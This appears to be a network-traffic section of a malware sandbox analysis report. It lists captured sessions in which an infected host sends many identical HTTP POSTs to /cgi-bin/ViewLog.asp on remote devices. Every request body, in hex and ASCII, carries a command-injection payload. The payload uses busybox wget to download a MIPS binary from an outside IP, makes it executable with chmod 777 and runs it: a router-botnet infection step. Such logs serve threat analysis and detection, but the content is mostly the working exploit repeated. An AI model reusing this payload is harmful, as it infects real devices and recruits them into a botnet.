                                              Nov 23, 2023 05:15:36.372864008 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              117192.168.2.135846031.136.68.2118080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:36.509010077 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:37.062628984 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:38.182605982 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:40.582611084 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:45.190664053 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:54.150604010 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:13.350720882 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:50.214432001 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              118192.168.2.135688431.136.44.268080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:36.510302067 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:37.062633991 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:38.182610989 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:40.582597017 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:45.190685987 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:54.150587082 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:13.350693941 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:50.214421034 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              119192.168.2.135005094.110.5.1398080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:36.517056942 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              120192.168.2.136069462.29.45.498080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:36.602896929 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              121192.168.2.134147494.122.18.2098080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:36.735595942 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              122192.168.2.133328085.95.152.998080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:36.825939894 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:37.144588947 CET308INHTTP/1.0 200 OK
                                              Server: httpd/2.0
                                              Date: Thu, 23 Nov 2023 04:16:15 GMT
                                              Content-Type: text/html
                                              Connection: close
                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 73 63 72 69 70 74 3e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 2f 4d 61 69 6e 5f 4c 6f 67 69 6e 2e 61 73 70 3f 65 72 72 6f 72 5f 73 74 61 74 75 73 3d 31 26 70 61 67 65 3d 69 6e 64 65 78 2e 61 73 70 26 6c 6f 63 6b 5f 74 69 6d 65 3d 30 27 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 48 45 41 44 3e 3c 2f 48 54 4d 4c 3e 0a
                                              Data Ascii: <HTML><HEAD><script>top.location.href='/Main_Login.asp?error_status=1&page=index.asp&lock_time=0';</script></HEAD></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              123192.168.2.133900294.120.98.1818080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:36.830491066 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              124192.168.2.135174694.126.239.48080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:37.299185038 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:38.214603901 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:38.387830973 CET148INHTTP/1.1 404 Not Found
                                              Date: Thu, 23 Nov 2023 04:15:38 GMT
                                              Connection: Close


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              125192.168.2.134779831.136.43.1338080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:37.309561014 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:40.326672077 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
